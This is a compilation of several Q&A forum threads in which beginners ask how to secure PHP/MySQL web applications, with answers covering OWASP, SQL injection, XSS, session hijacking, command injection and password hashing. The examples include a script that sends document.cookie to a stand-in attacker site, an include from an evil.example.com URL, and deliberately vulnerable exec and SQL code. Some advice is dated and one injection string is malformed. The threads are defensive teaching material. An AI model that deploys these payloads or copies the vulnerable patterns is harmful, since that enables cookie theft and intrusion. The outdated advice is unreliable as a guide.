This question already has answers here:
Closed 12 years ago.
Possible Duplicate:
PHP Session Security
I've just finished coding the basics of a web-app (the main code) and I've integrated a basic user system. This is my first web-app so I'm wondering what are the things that I should use to secure it? I already know about thing like mysql_real_escape_string() and strip_tags() but what else? How would I securely store usernames and passwords through cookies and sessions? Any tips, tutorials, etc. are greatly appreciated!
OWASP has some very helpful guides to the most common vulnerabilities and good recommendations as to how to mitigate them. You should familiarize yourself with the attacks and vulnerabilities they cover.
Reading through these might take time, but there's not too much and it's not particularly dense reading. Maybe you should focus on their top 10 security risks first.
CWE/SANS Top 25 Most Dangerous Software Errors helped me a lot.
real_escape_string only combats MySql injection. Also when a user must input a number, for example, reading newsid=n from a URL like index.php?newsid=3, make sure $_GET['newsid'] is an integer by adding (int) before $_GET['newsid'].
some really basic things ;) hope the link helps.
Related
As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, visit the help center for guidance.
Closed 10 years ago.
I'm coding my first php/mysql site and realize that I know very little about security beyond what I learned in my course/book. How much security knowledge do I need before I can publish my own site without being concerned that achieving even modest success will draw hackers and lead to my site being broken into?
If it helps with more specifics, I'm creating a site that will allow users to add plain text content, as well as browse what others have added. The text is meant to be stored in a db.
You cannot know everything, so it depends on what possible attack vectors your code has and what the risks are.
Ask yourself:
Do I include or read files based on user input? Then you should know, why white-listing is important and what the risks of stream wrappers are (i.e. include 'http://evil.example.com/hack.txt';). See: PHP - Is "include" function secure?
Do I output user generated content or content based on user input? Then you should know what XSS (Cross Site Scripting) is and how to prevent it
Do I use dynamic SQL queries? Then you should know what SQL Injections are and how to prevent them. Side note: Don't use the mysql_ functions anymore. See: The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead
Do I use sessions? Then you should know what Session Hijacking is and how to prevent it.
Do I use file uploads? Then you should know about securing file uploads (PDF link)
Do I handle user passwords? Then you should know about state-of-the-art password hashing, namely bcrypt. See: How do you use bcrypt for hashing passwords in PHP?
Do I use user-specific forms? Then you should know about CSRF (Cross Site Request Forgery) and how to prevent it
Do I use form that send mails? Then you should know about Email Injection or use a library that you know is secured against it, like swiftmailer.
Do I use any form at all? Then don't use PHP_SELF as its action, because XSS is also a possible attack on $_SERVER variables.
this list is not complete but should cover the most common use cases for simple web applications and their security threats
Regarding risk:
As soon as you handle sensible personal data of users or host the site on your own virtual server, you have additional responsibilities because the worst case is not anymore just that your site could be broken, but private data could be exposed, your server could transform into a spambot or worse.
The most important rule is: DON'T TRUST ANY INCOMING DATA
An extension to this rule, important for beginners: Use exactly the measures that fit the current context. DO NOT JUST THROW EVERYTHING AT THE USER INPUT THAT YOU KNOW AND HOPE IT WILL BE MORE SECURE, this is counterproductive! I often see questions like: "Is my application secure if I use addslashes(mysql_real_escape_string(strip_tags(htmlspecialchars()))) on all my $_POST variables?" - if you even consider this a valid approach, you have a serious misunderstanding of how security regarding user input works. I repeat: what's secure and what not, always depends on the context!
A great resource to learn from is the Open Web Application Security Project
It's never enough. But you will hopefully keep improving. And probably when you'll be ready, you'll know yourself.
Learn the most common security issues, such as:
Sql Injections
Form spoofing
XSS
and remember to:
always valide user input (including sessions)
block access to folders that shouldn't be public
to use blowfish instead of md5/sha1 for passwords
hide errors to the end user (and log them)
Also take a look at this guide which sums up the most famous security problems.
Take a look into SQL injections and XSS. It is all in validating a users input. Never trust a user.
SQL Injections
XSS
Last the best way to learn is suffer from an attack because of bad security. Then you understand how it works. Just one tip, make backups.
The most critical in your website would be that the users can provide text to your database.
Read this question here on stackoverflow for a good answer on how to prevent sql injection.
How to prevent sql injection in php
It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center.
Closed 10 years ago.
I've been reading a lot of articles on owasp.org and one of things that I remember most and couldn't understand well is securing PHP sessions.
I couldn't understand well how securing sessions goes and therefore I am asking here. What are the best way to secure sessions in PHP?
Side question: Are file inputs vulnerable by XSS?
This is the source for PHP sessions hijacking:
OWASP.org: PHP Security Cheat Sheet
What are the best way to secure sessions in PHP?
Security is nothing like let's say a bottle of milk you go buying in the shoppe. Reading customer reviews will probably tell you what the best milk is, however for Security this is a little different.
The customer reviews is what Owasp outlines. It tells you the general dynamics and implications to secure session handling.
As PHP sessions is only some kind of basic feature offered by PHP itself, there is not much to tell you what the best way is to secure these sessions, because it depends a lot on how you use that feature.
However one clear part of that best way to use PHP sessions, is to keep an eye on security reportings and reviews of PHP itself and the session feature in sepecific. Then take care you keep current to the version of PHP that offers the best way to secure sessions, which might be the latest stable version. Sometimes if flaws are reported, things are not entirely fixed in the next version, so take care.
Everything else not related to PHP specifically is undefined and Owasp can only offer a subset here.
So for security it is absolutely important that you first understand what is outlined in the Owasp documentation before you can start to apply this to (your) PHP code. E.g. by asking here, the best direction that can be given IMHO is that you learn harder to understand what is going on and what is meant in the Owasp docs.
Understanding how things work is key in security.
Here are some of the major issues to keep in mind:
Not validating user input
Suppose you have a web page that allows user to see the contents of a folder (for example your a hosting company and showing the user their files on the server)
Here is some code that might make it happen:
$directory = $_GET['directory'];
exec("ls $directory", $result);
An attacker can exploit this by passing in other commands in to the url string, such as:
ls -LR
Session Hijacking
Each session has a unique ID, if an attacker gets a hold of it they can (potentially) use it to obtain confidential information.
To protect against this have the user reauthenticate (with their passwords) before doing anything sensitive (for example, if the user wants to reset their password, force them to enter the old password first)
XSS (cross site scripting attack)
Whenever you have a site with user generated content (a good example of this is comments on a blog), there is a potential threat that an attacker will place javaScript in to his content (read: his comment) that could potentially harm all users that come to the page.
Here is an example:
<script>
document.location = 'http://www.hackingYou.com/stealYourData.php?' + document.cookie;
</script>
This code will allow the attackers website (hackingYou.com) to steal the cookie that you have for the website you are currently visiting.
One way to protect against this is to remove any HTML from any string being inputted using the following command:
strip_tags($input);
SQL Injection
(wouldn't be a decent answer without this one)
Suppose you have a web page that logs in users to a site. In order to log them in successfully you check for their record in a DB.
Here is how it might be coded:
$sql = "SELECT * FROM users WHERE username = $_GET['username'] and password = $_GET['password']";
An attacker can exploit this by entering in to the password field:
abcd OR WHERE 1 = 1
The resulting sql statement would look like this:
SELECT * FROM users WHERE username = hacker AND password = abcd OR WHERE 1 = 1;
This would spit out the full table of ALL usernames and passwords to the attacker.
To protect against this "sanitize" your input strings for SQL using the following command:
mysql_real_escape_string($input)
This is most of the basics, obviously one should always keep up to date by reading the latest security bulletins, such as:
Bug Track
PHP Security Consortium (PHP experts who focus on security)
OWASP
The best way to ensure security to all your envoirment is to learn a PHP web framework, which wil give you, ready-to-go, security level inputs.
Obviously , security, doesn't exist, it exist a better security and a worst security, what i suggest you is to not reinvent the wheel, so web frameworks are deeply fixed everyday, according to community bug/hack reports, and this , i think, is the biggest security level you can get!
What security considerations should I/do I have to take into account if I decide to make a professional website(HTML,CSS,JavaScript,PHP,etc.). For example, when having a database, one should think about hackers who want to hack the website by SQL-injection. But there are many other examples. What I would like to know is a list of things(security) a webmaster must consider/take into account. Also maybe some things that are recommended, but not a must. A short explanation about each topic is much appreciated, but you don't have to. Thanks in advance.
btw. I'm not sure about the tags. Please add/modify if you know better.
The best resource for securing web applications is the OWASP Top 10: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
I suggest you read through each of these top 10 security risks and ensure you understand three things:
What the risk is
How it is exploited
How to protect against it in you language of choice
This question already has answers here:
Closed 12 years ago.
Possible Duplicate:
Where can I find a web-project “security checklist?”
i was just wondering when creating an php/mysql app, whats the main security issues a developer is got to consider, i know this could be a major broad topic, but i just wanted an overview of where to look, and while im wrting and devloping the app, what i need to be aware of thans!! :))
VERY broad topic indeed. Just to name the basics, which ideally everyone should be aware of:
Don't trust any user input. But this I mean sanitize all user input to prevent SQL injection
Escape all data being outputted on the page appropriately to prevent XSS vulnerabilities and cookie data.
Do not include files based on user input
Log all your errors appropriately. Ideally, in an error log.
Store passwords via a one way hash which incorporate a secure salt.
And read through Seven habits for writing secure PHP applications.
You can take a look at the OWASP Top 10, which is a top 10 of the most common flaw in web application. It converts the most common issue that you will come through.
Web version
PDF version
There's some very useful references to security checklists that you should consider in this previous response to the same question
I just read this article about piggy backing in PHP.
I googled it but not so much information there.
Can anyone tell me more details how to prevent this kind of attack, what kind of code practices are vulnable and what we should do?
Thanks in advance.
That article seems to refer to a vulnerable web application, not anything specific to PHP.
This previous thread provides some useful information regarding writing secure PHP code:
What security issues should I look out for in PHP
If we take the "They used these vulnerabilities to inject PHP code into the site" part of the article literally, then the developers likely used user input with include/require statements or eval
The article isn't particularly clear, but my guess is that they just used SQL injection and, to try to avoid detection, they inserted a script that didn't actually change the behavior of the site normally unless the visitor came from Google using a relevant search term, and the author is calling the redirection in that situation "piggybacking".
So: escape and validate all user input.
First link really on the general subject should give you some overview.
Second link is PHP / SQL - specific and should lead you to enlightenment.
The BBC news article is talking about "persistent xss". Leave it to the news to talk about hacking without mentioning anything about vulnerabilities. But that could be that the bbc.co.uk dosen't know what an xss vulnerability is, because if they did they would patch their own damn site!.
There are many ways to achieve remote code execution against a PHP web application. No one should ever call this "PHP Injection", if they call it this then they don't know what they are talking about. A Study In Scarlet is an excellent paper that details many different methods that an attacker can use to obtain remote code execution against a PHP application. This paper is intended for malicious hackers, not developers.
XSS is by far the easiest and most common method to nefariously palace advertisements on somebody's site.